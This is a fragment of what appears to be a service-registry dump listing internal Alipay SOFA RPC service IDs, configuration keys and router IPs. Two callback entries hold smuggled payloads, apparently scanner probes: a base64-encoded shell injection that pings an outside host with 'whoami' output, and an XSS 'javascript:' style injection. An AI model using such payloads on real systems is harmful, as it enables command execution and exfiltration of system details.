AULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openitemcore.common.service.facade.api.item.ItemQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.linepay.common.serivce.facade.mng.convert.BizNoConvertService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.messagefusion.facade.api.FanoutFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.finforward.common.service.facade.api.RecFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchishub.common.service.facade.api.OneStopCfgForMrchisWisdomFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.167.145.24#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.prodmng:name=com.alipay.common.security.dresource.SecurityCommonDrm.totalUrlDecodeTimes,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zdatabus:name=com.alipay.zdatabus.common.agent.drm.ZdatabusClientLineageDRM.useNoLineageResultRule,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.ebppgw.facade.DataSecurityFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.baymax.maintainess.drm.scheduleParameter.app_finfocore.bizSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.124.130.159#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.antgroup.antchain.myentcore.common.service.facade.api.ShareCodeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:IjtwaW5nIGB3aG9hbWlgTXpNd01qUTROamt0TFRFd05EQXdNekF6TlEuc3NyZi5ub2JsZS5sb2cubHlubnNoYXJlLmNjOyI=@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.bankcardTairCache.czoneSwitchMap,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.rpc.elastic.ElasticService:1.0:apyunqing@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.poscore:name=com.alipay.zcache.tbase.customerTairCache.localCacheSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","cn.com.antcloud.acwareslifecore.common.service.facade.TemporaryOpenFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.insptmarket.client.account.extension.AccountCardFetcherComponent:1.0:inslifeprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.inshealthmarket.common.service.facade.service.OutOrderQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:\" style=background:url(javascript:alert('antscanGIYHU5BSMQWTC5LVPJRW2LLVNZUXC5LFJFSC2ZDFMRWGG3T2MM------')) \"@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@frscenter#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.taskcenter.common.service.facade.callback.ProcessTaskCallback:1.0.0:publichome_appOnLineCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.client.SystemAppInvokeService:1.0:bpservice@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bksigncentre_contractSealCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_F_GFAC_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_30.50.68.35#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.zdatabusPayInfoTairCache.zonePolicy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.antcloud.infrastructure.facade.environment.EnvironmentExplorer:1.0:SECURITY_GROUP@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dayudrill.facade.InjectTraceService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insttrade:name=com.alipay.zcache.switcher.bankcardTairCache.switcherValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.afsc.common.service.amc.service.AmcCustomerEquityFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opencore.service.facade.security.SecurityQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinsnsprod.service.facade.api.hotevent.ProdHotEventSubjectFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mdeduct.common.service.facade.agreement.MpaSignAfterPayServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finasmcore.biz.shared.repository.ZdalSequenceRepository:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.oyz.core.facade.api.RequirementFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkdepmng_revokeDepositCertCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpdcore:name=com.alipay.fin.pdcore.core.service.innerclient.master.drm.MasterConfigDRM.productSyncStrategy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.50.102.59#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","config:com.alipay.openeval.common.service.facade.openservice.OpenServiceInvokeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","NS_Pub_Servers_TP_S_2301_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.buservice.common.service.facade.UserService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finpromoscene.core.service.taskflow.repo.YebcCampRecordFlowRepository:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dcprod.common.service.facade.CommunityOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.reading.common.service.facade.game.PaperFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.platform.schedule.concurrent.split.Splitor:1.0:penetrateOnchainSubmitTask@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.masterdata.common.service.facade.trigger.MdmClientRepositoryAccessor:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkaccorderprod.service.facade.RaiseFundFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchstoreapp.common.service.facade.store.StoreDataFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.mif.common.service.facade.brand.BrandAuthorizationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkdepmng_fixedDeposit2ProcessCallBack@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.fininfo:name=com.alipay.zcache.log.fininfo.logLevel,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mrchprod.common.service.facade.open.AppBindFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mcenter.common.dal.mcenter.auto.daointerface.McenterCreditpayDAO:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.finfocore.common.service.integration.drm.DrmDebugManager.resultLogOpen,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.dchaincustomer.facade.api.mychainaccount.MychainAccountService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.scardcenter.common.service.facade.OfflinepayCustomBusServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.afsc.common.service.ruleengine.service.ReSystemLoadLogServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.common.service.facade.relatedreading.api.RelatedReadingFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.182.84#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.antcommonweal.common.service.facade.api.AcwCommonStatisticFacade:1.0:antcommonweal@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openmq.common.service.facade.MessageCallbackService:1.0:muac@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.keplerfeature:name=com.alipay.antfeaturelib.core.feature.drm.AntFeatureConfigResource.publishCommand,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:zhubalipay@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.muac.api.facade.qdb.TrapShopFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.merchant.common.service.facade.MccQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gacplatform.facade.api.GacPlatformServiceFacade:1.0:orgassertquerydata@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.tradeexprod.common.service.facade.RefundDetailFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mcomment.common.service.facade.comment.CommentGZQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:pcmerchantprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.finfocore.common.service.integration.drm.DrmCdsTempManager.serviceFavourRecomCompletionEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.promobench.common.service.facade.service.MaterialPoolManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finpensionprod.common.service.facade.PensionAccountLimitFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.242.83#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_11.124.190.44#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.fcbuservice.common.service.facade.ext.DingDingAppFacade:1.0:antzhixin@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_O_ANTACP#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.infosec.core.hbase.HBaseComponent:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.newsencequalitycenter.facade.SampleService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acticketmng.common.service.facade.api.manage.ApiGroupFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finauth.common.service.facade.task.TaskCallBackFacade:1.0:zsTask@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitycore.common.service.facade.product.spi.SecurityProductChecker:1.0:securityidentify@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lendpofprod:name=com.alipay.lendpofprod.core.shared.drm.LoanP2pConfigDrm.investorIntRateForYearStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finasmcore.common.service.integration.promokernel.PrizeSendOrderQueryFacadeClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.177.49#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipayplus.gmp.miniprogram.ability.common.facade.MiniprogramAbilityJsApiService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:assetchain@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.oyz.core.facade.api.CommonProcessFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lifemng:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.loadTestIslandMode,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.ipay.iexchange.service.facade.api.ExchangeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.processmngTairCache.useZoneMng,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.158.104.193#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fundprod.common.service.facade.product.query.IndicatorQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.paycheckerCZTBaseCache.compressionThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.insopenprod.core.service.lock.DistributedLockService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.airbops:name=com.alipay.common.security.dresource.SecurityCommonDrm.customJsonSuffixContains,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.userview.facade.UserLabelService:1.0@DEFAULT@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.etetestcore:name=com.alipay.etetestcore.service.integration.drm.DrmValidateSceneManager.cashiercoreCheck,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kbtraffic.common.service.facade.api.schedule.ScheduleDtbBindFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditschedule.service.facade.spi.ExecuteService:1.0:auto_update_member_template_status_handler@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.aciamcore.common.service.facade.access.OauthClientServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promocenter.facade.api.financial.FinancialActivityManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.envcenter:name=com.alipay.common.tracer.manage.TracerDrm.zdalDbDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.airbops.service.common.proxy.cif.facade.ProxySystemParameterQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zqueue.server.sigma-job-5fe07fbfd8ce5803a4a182cf-random-m46hs-25mz9.qaZQueue32#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.finvirtualta.core.service.fund.repository.FinSysParamRepository:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchportalcore.common.service.facade.antforest.AntforestMrchTaskManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insttrade.common.service.facade.test.CommonMessageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.msfluxconf:name=com.alipay.fc.fluxconf.fluxconfClient.drm.CtrlDataResource.domains,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finassetprod.common.facade.BehaviorFeedbackFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.revcore:name=com.alipay.common.tracer.manage.TracerDrm.zdalDbDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kbshopdecorate.common.service.facade.kbserv.decorate.DecorateGrayConsultFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secuprod.biz.community.user.PhotoUploadService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.tr-service-enable:name=com.alipay.sla.businessgray.drm.BusinessGrayPolicy.businessPolicy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.inshealthprod.facade.HealthReserveModifyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.merchant.integration.test.facade.SampleService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instfund.facade.api.InstAccountQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.3.28#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.bizprodmng:name=com.alipay.common.security.dresource.SecurityCommonDrm.customJsonSuffixContains,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.mybank.bkstmtcore.common.service.facade.customer.acctdetail.CustAcctDetailQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.trade.ext.service.api.RefundFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.afsc.common.service.front.FrontRequestService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insleads.common.service.facade.im.IMChatFacadeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.55.211.102#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.revcore:name=com.alipay.common.tracer.manage.TracerDrm.zdalOcsDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kbpromodataaggr.common.service.nearquery.api.DisplayPromoQueryFacadeClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchprod.common.service.facade.datafactory.DataFactoryTaskTrFacade:1.0:mif_mcc_data_sync@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dscmcenter.common.service.facade.meta.map.ProjectFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.caprod.service.sign.facade.CertificateService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bcm.common.service.facade.SecretKeyOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.investtrade.facade.api.security.SecurityDealOptionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.136.229#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.sofa.rpc.elastic.ElasticService:1.0:finpromoscene@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.aip.profit.schedule.calculate.drm.ProfitCalculateDRMResource.checkFixAdd,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.superapi.common.core.client.AppInvokeService:1.0:sdarttool@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_S_DISPUTE_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.sdchecker.service.analyze.facade.DqBlinkReportService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:antslsconsole@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.socialcore.facade.ps.user.UserCrowdDefineFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fincommontaskhub.service.facade.service.spi.FinalizeService:1.0:finvirtualta@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.irecon.common.service.query.fund.api.QueryReconLogResultService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.fraudmng:name=com.alipay.cif.model.cache.CifCOControlSwitch.l2WriteCustProp,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.ap.smartdelivery.common.service.facade.spi.DeliveryDecisionSpi:1.0:apsmartgrowth_deliveryDecisionSpi@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antfeaturelib.common.facade.service.BizSystemService:1.0:xztest_antfeaturemeta@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zdataquery.common.service.facade.hbase.FinTntOutfluxHbaseQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finpwm.facade.smartant.SmartAntBannerCardFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.poscore:name=com.alipay.poscore.common.service.integration.drm.impl.DrmResourceTrigger.realNameSameCardNoBindedExceedStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.73.156.69#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.addpInsttradeTairRz.elastic,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.insmobile.common.service.community.facade.QuestionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.spannermng.common.service.facade.DisasterRecoverFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zskynet:name=com.alipay.common.webx.session.drm.SessionLogDrm.formtokenSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.ebppcore.facade.SyncProdSwitchFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.frgcenter.common.service.facade.api.MetaDataServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_S_RTCENTER#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.lendpofprod:name=com.alipay.lendpofprod.core.shared.drm.UcaMigrateDrm.loancoreSwitchStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobileiclib.common.service.facade.product.spi.SecurityProductManagerService:1.0:zhubalipay@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securityops.common.service.facade.api.SecOpsChangeQueryFacade:1.0:securityops@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.routeclient.interfacename:aladdinsff#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.finfocore:name=com.alipay.cif.drm.PasswordRevokeSwitch.simplePasswordRevoked,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.riskmng:name=com.alipay.riskmng.common.service.integration.drm.VarCalculateParamCheckSwitch.varCalculateParamCheckSwitchStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.ecquery.common.service.contract.ContractQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.yingxutestRZTBaseCache.zonePolicy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.45.128.246#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finlinkanalysis.common.service.facade.datacheck.CommonDataCheckFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.yebcore.common.facade.service.query.TaskFlowQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.26.188#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finstore.common.service.facade.fop.api.ShopCampTriggerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.88.157.109#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.73.166.97#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.paycore.service.withdraw.api.ManageWithdrawService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finopencore.common.service.interactiondraw.facade.InteractionDrawTriggerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.158.244#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mfinsnsprod.service.facade.api.AdvertisementFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.iliquidity.core.service.predictionmonitor.engine.PredictEventEngine:1.0:commonRule@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openitemcore.common.service.facade.api.risk.ServiceRiskHandleFacade:1.0:APPXCORE@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fincommontaskhub.service.facade.service.spi.ExecuteService:1.0:vehownerprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservicesinspect.biz.inspect.decision.EcoFlowControlDetailService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:openbizmock@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acassistant.common.service.facade.KnowledgeBaseFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","cn.com.antcloud.acwareslifecore.common.service.facade.OfferMigrationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilepep.service.facade.ContentFusionEventMsgFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.contentlib.common.service.facade.livekit.LiveMerchantFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:fccustmng_merchant_drm_config@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcredittrans.facade.api.PcreditAccountInfoQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilechannel.senior.common.service.facade.api.ChannelSettingFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zcbsalescenter.common.service.facade.user.AgreementQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditbillcenter.facade.service.sync.InstallmentSyncDataFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paydecision.service.manage.api.PaydecisionManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ifxposition.service.facade.instrument.InstrumentValueDaysQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antassistant.common.service.facade.api.BotFacadeService:1.0:anna_assistant@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.166.157.182#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.etetestcore.service.api.kbticketcenter.KbtTmallUseTicketService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dsmp.common.service.facade.privilege.service.v2.ApproveServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ck:name=com.alipay.zdal.config.groupCluster.tradeexpord_config_gc.ck,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finpwm:name=com.alipay.finpwm.biz.starwish.drm.impl.SavingPlanDrmImpl.maxHoldAmount,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.124.22.14#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","HEALTHY_V2@instbill#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","Alipay.lendpofprod:name=com.alipay.lendpofprod.core.shared.drm.LoanDecisionSwitchDrm.openAllPlatOrgSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.appxcore.common.service.facade.api.tag.TagItemMngConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.forexcore.common.service.facade.ForexUserPurFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_SOFA4TEST#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antfeaturelib.common.facade.service.DataViewCalcService:1.0:security_antfeaturemeta@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:offlineRepayApplyCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csmonitor.common.service.facade.formula.FormulaDefFacadeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.sandboxhome:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.faultInGlobalSwitchValue,version=3.0@DRM#